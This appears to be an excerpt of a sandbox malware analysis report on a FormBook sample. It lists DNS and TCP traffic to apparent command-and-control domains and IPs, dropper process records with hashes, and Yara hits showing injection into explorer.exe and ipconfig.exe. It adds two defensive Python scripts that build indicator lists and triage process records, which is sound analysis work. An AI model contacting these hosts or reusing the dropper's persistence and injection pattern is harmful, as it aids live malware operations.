Nov 30, 2022 02:22:44.379976034 CET | 80 | 49717 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:44.380150080 CET | 49717 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:45.204660892 CET | 49717 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:46.220715046 CET | 49718 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:46.387703896 CET | 80 | 49718 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:46.387904882 CET | 49718 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:46.388169050 CET | 49718 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:46.555027008 CET | 80 | 49718 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:46.590737104 CET | 80 | 49718 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:46.642049074 CET | 49718 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:56.607110977 CET | 80 | 49718 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:22:56.607465029 CET | 49718 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:56.607465029 CET | 49718 | 80 | 192.168.2.3 | 50.87.143.200
Nov 30, 2022 02:22:56.774600029 CET | 80 | 49718 | 50.87.143.200 | 192.168.2.3
Nov 30, 2022 02:23:01.713402987 CET | 49719 | 80 | 192.168.2.3 | 194.58.112.174
Nov 30, 2022 02:23:01.775351048 CET | 80 | 49719 | 194.58.112.174 | 192.168.2.3
Nov 30, 2022 02:23:01.775471926 CET | 49719 | 80 | 192.168.2.3 | 194.58.112.174
Nov 30, 2022 02:23:01.775626898 CET | 49719 | 80 | 192.168.2.3 | 194.58.112.174
Nov 30, 2022 02:23:01.837239027 CET | 80 | 49719 | 194.58.112.174 | 192.168.2.3
Nov 30, 2022 02:23:01.837311029 CET | 80 | 49719 | 194.58.112.174 | 192.168.2.3
Nov 30, 2022 02:23:01.837358952 CET | 80 | 49719 | 194.58.112.174 | 192.168.2.3
Nov 30, 2022 02:23:01.837461948 CET | 49719 | 80 | 192.168.2.3 | 194.58.112.174
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 30, 2022 02:22:22.742185116 CET | 52387 | 53 | 192.168.2.3 | 8.8.8.8
Nov 30, 2022 02:22:22.777436972 CET | 53 | 52387 | 8.8.8.8 | 192.168.2.3
Nov 30, 2022 02:22:27.925657988 CET | 56924 | 53 | 192.168.2.3 | 8.8.8.8
Nov 30, 2022 02:22:27.958118916 CET | 53 | 56924 | 8.8.8.8 | 192.168.2.3
Nov 30, 2022 02:22:39.482861042 CET | 60625 | 53 | 192.168.2.3 | 8.8.8.8
Nov 30, 2022 02:22:39.629431009 CET | 53 | 60625 | 8.8.8.8 | 192.168.2.3
Nov 30, 2022 02:23:01.644376993 CET | 49302 | 53 | 192.168.2.3 | 8.8.8.8
Nov 30, 2022 02:23:01.712326050 CET | 53 | 49302 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 30, 2022 02:22:22.742185116 CET | 192.168.2.3 | 8.8.8.8 | 0x14f2 | Standard query (0) | www.inhomeyoga.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 02:22:27.925657988 CET | 192.168.2.3 | 8.8.8.8 | 0xdff8 | Standard query (0) | www.fedefarmatour.online | A (IP address) | IN (0x0001) | false
Nov 30, 2022 02:22:39.482861042 CET | 192.168.2.3 | 8.8.8.8 | 0xe02d | Standard query (0) | www.t4yfrance.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 02:23:01.644376993 CET | 192.168.2.3 | 8.8.8.8 | 0xd8c3 | Standard query (0) | www.a8-group.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 30, 2022 02:22:22.777436972 CET | 8.8.8.8 | 192.168.2.3 | 0x14f2 | No error (0) | www.inhomeyoga.com | inhomeyoga.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2022 02:22:22.777436972 CET | 8.8.8.8 | 192.168.2.3 | 0x14f2 | No error (0) | inhomeyoga.com | - | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 02:22:27.958118916 CET | 8.8.8.8 | 192.168.2.3 | 0xdff8 | No error (0) | www.fedefarmatour.online | fedefarmatour.online | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2022 02:22:27.958118916 CET | 8.8.8.8 | 192.168.2.3 | 0xdff8 | No error (0) | fedefarmatour.online | - | 81.88.48.71 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 02:22:39.629431009 CET | 8.8.8.8 | 192.168.2.3 | 0xe02d | No error (0) | www.t4yfrance.com | t4yfrance.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2022 02:22:39.629431009 CET | 8.8.8.8 | 192.168.2.3 | 0xe02d | No error (0) | t4yfrance.com | - | 50.87.143.200 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 02:23:01.712326050 CET | 8.8.8.8 | 192.168.2.3 | 0xd8c3 | No error (0) | www.a8-group.com | - | 194.58.112.174 | A (IP address) | IN (0x0001) | false
                                          • www.inhomeyoga.com
                                          • www.fedefarmatour.online
                                          • www.t4yfrance.com
                                          • www.a8-group.com
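The DNS and TCP tables above only become useful IOCs once they are joined: the query names resolve through CNAME chains to addresses, and only some of those addresses then receive TCP traffic (in the packet rows shown in this section, 50.87.143.200 for www.t4yfrance.com and 194.58.112.174 for www.a8-group.com; www.inhomeyoga.com and www.fedefarmatour.online resolve but receive no connection here). The script below is an added example written for this report, not Joe Sandbox code. It carries the four DNS transactions and a subset of the TCP rows, transcribed from the tables above into a pipe-separated layout that is this script's own assumption, follows each CNAME chain within its transaction ID, and marks which resolved hosts were actually contacted.

```python
"""Join a sandbox report's DNS query/answer tables with its TCP packet table
into a contacted-host IOC list.

Added example for this report, not Joe Sandbox code. The pipe-separated row
layout is an assumption of this script; the values are transcribed from the
tables above (the TCP rows are a subset of those shown)."""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

LOCAL_IP = "192.168.2.3"   # the analysis VM, per the packet tables above

# Constructed sample: DNS queries as "trans id | queried name".
DNS_QUERIES = """
0x14f2 | www.inhomeyoga.com
0xdff8 | www.fedefarmatour.online
0xe02d | www.t4yfrance.com
0xd8c3 | www.a8-group.com
"""

# Constructed sample: DNS answers as "trans id | name | cname | address | type".
DNS_ANSWERS = """
0x14f2 | www.inhomeyoga.com | inhomeyoga.com | - | CNAME
0x14f2 | inhomeyoga.com | - | 195.110.124.133 | A
0xdff8 | www.fedefarmatour.online | fedefarmatour.online | - | CNAME
0xdff8 | fedefarmatour.online | - | 81.88.48.71 | A
0xe02d | www.t4yfrance.com | t4yfrance.com | - | CNAME
0xe02d | t4yfrance.com | - | 50.87.143.200 | A
0xd8c3 | www.a8-group.com | - | 194.58.112.174 | A
"""

# Constructed sample: a subset of the TCP rows, "src port | dst port | src ip | dst ip".
TCP_PACKETS = """
49717 | 80 | 192.168.2.3 | 50.87.143.200
80 | 49717 | 50.87.143.200 | 192.168.2.3
49718 | 80 | 192.168.2.3 | 50.87.143.200
80 | 49718 | 50.87.143.200 | 192.168.2.3
49719 | 80 | 192.168.2.3 | 194.58.112.174
80 | 49719 | 194.58.112.174 | 192.168.2.3
"""


def _rows(text: str) -> List[List[str]]:
    """Split a pipe-separated block into stripped cells, skipping blank lines."""
    return [[c.strip() for c in line.split("|")]
            for line in text.strip().splitlines() if line.strip()]


def resolve_queries(queries: str, answers: str) -> Dict[str, List[str]]:
    """Map each queried name to the A records reached by following the CNAME
    chain inside the same DNS transaction (answers from other transactions are
    never mixed in, even for the same name)."""
    per_txn: Dict[str, Dict[str, List[Tuple[str, str]]]] = defaultdict(lambda: defaultdict(list))
    for txn, name, cname, addr, rtype in _rows(answers):
        per_txn[txn][name].append((rtype, cname if rtype == "CNAME" else addr))
    resolved: Dict[str, List[str]] = {}
    for txn, qname in _rows(queries):
        ips, pending, seen = [], [qname], set()
        while pending:
            name = pending.pop()
            if name in seen:          # guard against CNAME loops in hostile answers
                continue
            seen.add(name)
            for rtype, value in per_txn[txn].get(name, []):
                (pending if rtype == "CNAME" else ips).append(value)
        resolved[qname] = sorted(set(ips))
    return resolved


def outbound_flows(packets: str, local_ip: str = LOCAL_IP) -> Dict[str, Set[Tuple[int, int]]]:
    """Group packets sent by the analysis VM into (src port, dst port) flows per remote IP."""
    flows: Dict[str, Set[Tuple[int, int]]] = defaultdict(set)
    for sport, dport, sip, dip in _rows(packets):
        if sip == local_ip:
            flows[dip].add((int(sport), int(dport)))
    return flows


def build_iocs(queries: str = DNS_QUERIES, answers: str = DNS_ANSWERS,
               packets: str = TCP_PACKETS) -> List[dict]:
    """One record per queried domain: resolved IPs and whether any of them
    received traffic. A domain that resolves but is never contacted is still
    worth listing, just with lower confidence."""
    resolved = resolve_queries(queries, answers)
    flows = outbound_flows(packets)
    iocs = []
    for domain, ips in resolved.items():
        contacted = sorted(f for ip in ips for f in flows.get(ip, ()))
        iocs.append({"domain": domain, "ips": ips,
                     "contacted": bool(contacted), "flows": contacted})
    return iocs


if __name__ == "__main__":
    for ioc in build_iocs():
        mark = "CONTACTED" if ioc["contacted"] else "resolved only"
        print(f"{ioc['domain']:28} {', '.join(ioc['ips']):18} {mark} {ioc['flows']}")
```

Keying the CNAME walk on the transaction ID matters: a sandbox capture can contain several resolutions of the same name over a run, and mixing answers across transactions would attribute an address to the wrong query. Treat the "contacted" flag as specific to the packet rows fed in; a different excerpt of the same capture may show traffic to hosts that are marked resolved-only here.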


                                          Target ID:0
                                          Start time:02:20:59
                                          Start date:30/11/2022
                                          Path:C:\Users\user\Desktop\PrWP76ejHO.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\PrWP76ejHO.exe
                                          Imagebase:0x400000
                                          File size:318559 bytes
                                          MD5 hash:DB102A67350060A1E967AEF81118F18D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low

                                          Target ID:1
                                          Start time:02:21:00
                                          Start date:30/11/2022
                                          Path:C:\Users\user\AppData\Local\Temp\iscan.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
                                          Imagebase:0x400000
                                          File size:125440 bytes
                                          MD5 hash:2B4B3369E04DEDD66517641DB0F5A8AB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 27%, ReversingLabs
                                          Reputation:low

                                          Target ID:2
                                          Start time:02:21:00
                                          Start date:30/11/2022
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff745070000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:3
                                          Start time:02:21:01
                                          Start date:30/11/2022
                                          Path:C:\Users\user\AppData\Local\Temp\iscan.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
                                          Imagebase:0x400000
                                          File size:125440 bytes
                                          MD5 hash:2B4B3369E04DEDD66517641DB0F5A8AB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Target ID:4
                                          Start time:02:21:06
                                          Start date:30/11/2022
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff69fe90000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Target ID:5
                                          Start time:02:21:13
                                          Start date:30/11/2022
                                          Path:C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
                                          Imagebase:0x400000
                                          File size:125440 bytes
                                          MD5 hash:2B4B3369E04DEDD66517641DB0F5A8AB
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 27%, ReversingLabs
                                          Reputation:low

                                          Target ID:6
                                          Start time:02:21:13
                                          Start date:30/11/2022
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff745070000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:9
                                          Start time:02:21:18
                                          Start date:30/11/2022
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 452
                                          Imagebase:0x140000
                                          File size:434592 bytes
                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:12
                                          Start time:02:21:21
                                          Start date:30/11/2022
                                          Path:C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
                                          Imagebase:0x400000
                                          File size:125440 bytes
                                          MD5 hash:2B4B3369E04DEDD66517641DB0F5A8AB
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:low

                                          Target ID:13
                                          Start time:02:21:21
                                          Start date:30/11/2022
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff745070000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:17
                                          Start time:02:21:23
                                          Start date:30/11/2022
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 420
                                          Imagebase:0x140000
                                          File size:434592 bytes
                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language

                                          Target ID:22
                                          Start time:02:21:49
                                          Start date:30/11/2022
                                          Path:C:\Windows\SysWOW64\ipconfig.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                          Imagebase:0x210000
                                          File size:29184 bytes
                                          MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
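The process records above carry the whole FormBook chain in their fields: the same MD5 (2B4B3369E04DEDD66517641DB0F5A8AB) runs first from %TEMP%\iscan.exe and then from a fresh directory under AppData\Roaming, two Microsoft binaries (explorer.exe and ipconfig.exe) have FormBook Yara hits in memory that their on-disk images cannot explain, and WerFault is launched for crashed PIDs along the way. The triage script below is an added example written for this report, not Joe Sandbox code. It parses a transcribed subset of the records in the page's own "Key:Value" block form (the only layout it assumes) and surfaces those three observations mechanically.

```python
"""Triage the per-process records of a sandbox report for what a FormBook
chain leaves behind: malware-family Yara hits inside Windows-directory
binaries (injection targets), a dropper re-executing from a second profile
path with the same hash (persistence copy), and WerFault crash reports.

Added example for this report, not Joe Sandbox code. The record text is
transcribed from the process list above (lists trimmed); the "Key:Value"
block layout is the only format assumed."""
import re
from typing import Dict, List, Tuple

# Constructed sample: five of the records above, with their list fields trimmed.
PROCESS_RECORDS = r"""
Target ID:1
Path:C:\Users\user\AppData\Local\Temp\iscan.exe
Commandline:"C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
MD5 hash:2B4B3369E04DEDD66517641DB0F5A8AB
Antivirus matches:
• Detection: 100%, Joe Sandbox ML

Target ID:4
Path:C:\Windows\explorer.exe
Commandline:C:\Windows\Explorer.EXE
MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

Target ID:5
Path:C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe
MD5 hash:2B4B3369E04DEDD66517641DB0F5A8AB

Target ID:9
Path:C:\Windows\SysWOW64\WerFault.exe
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 452
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B

Target ID:22
Path:C:\Windows\SysWOW64\ipconfig.exe
Commandline:C:\Windows\SysWOW64\ipconfig.exe
MD5 hash:B0C7423D02A007461C850CD0DFE09318
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
"""

WINDOWS_DIR = re.compile(r"^c:\\windows\\", re.IGNORECASE)
PROFILE_DIR = re.compile(r"^c:\\users\\[^\\]+\\appdata\\", re.IGNORECASE)
WERFAULT_PID = re.compile(r"WerFault\.exe .*-p (\d+)")


def parse_records(text: str) -> List[Dict[str, object]]:
    """Split "Key:Value" blocks separated by blank lines. A key with an empty
    value (e.g. "Yara matches:") opens a list that absorbs the bullet lines
    after it. Splitting on the first colon keeps drive letters in paths intact."""
    records, current, list_key = [], {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            if current:
                records.append(current)
            current, list_key = {}, None
            continue
        if line.startswith("•"):
            current.setdefault(list_key, []).append(line.lstrip("• ").strip())
            continue
        key, _, value = line.partition(":")
        if value == "":
            list_key = key
            current[key] = []
        else:
            current[key] = value
    if current:
        records.append(current)
    return records


def injected_system_processes(records: List[Dict[str, object]]) -> List[str]:
    """Windows-directory binaries whose memory matched a malware-family rule;
    the code did not come from the image on disk, so something injected it."""
    return [r["Path"] for r in records
            if WINDOWS_DIR.match(str(r.get("Path", ""))) and r.get("Yara matches")]


def dropper_copies(records: List[Dict[str, object]]) -> List[Tuple[str, str]]:
    """(original, copy) pairs: distinct profile-path executables sharing an MD5,
    i.e. the dropper re-executing itself from a new location."""
    paths_by_hash: Dict[str, List[str]] = {}
    for r in records:
        path = str(r.get("Path", ""))
        if PROFILE_DIR.match(path):
            seen = paths_by_hash.setdefault(str(r.get("MD5 hash", "")), [])
            if path not in seen:
                seen.append(path)
    return [(p[0], q) for p in paths_by_hash.values() if len(p) > 1 for q in p[1:]]


def crashed_pids(records: List[Dict[str, object]]) -> List[int]:
    """PIDs that WerFault was started for (the -p argument)."""
    return [int(m.group(1)) for r in records
            if (m := WERFAULT_PID.search(str(r.get("Commandline", ""))))]


def triage(text: str = PROCESS_RECORDS) -> Dict[str, object]:
    records = parse_records(text)
    return {"injected": injected_system_processes(records),
            "copies": dropper_copies(records),
            "crashed_pids": crashed_pids(records)}


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

The injection rule is deliberately narrow: it fires only on a family-specific rule hit inside a binary under C:\Windows, which a legitimate process cannot produce by itself. The hash rule pairs on MD5 because that is the only digest the report exposes per process; on a live host, prefer SHA-256 from the EDR. Note that ipconfig.exe appearing as an injection target rather than a child of the dropper is the behaviour flagged in the signature list as "Uses ipconfig to lookup or modify the Windows network settings".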

                                          No disassembly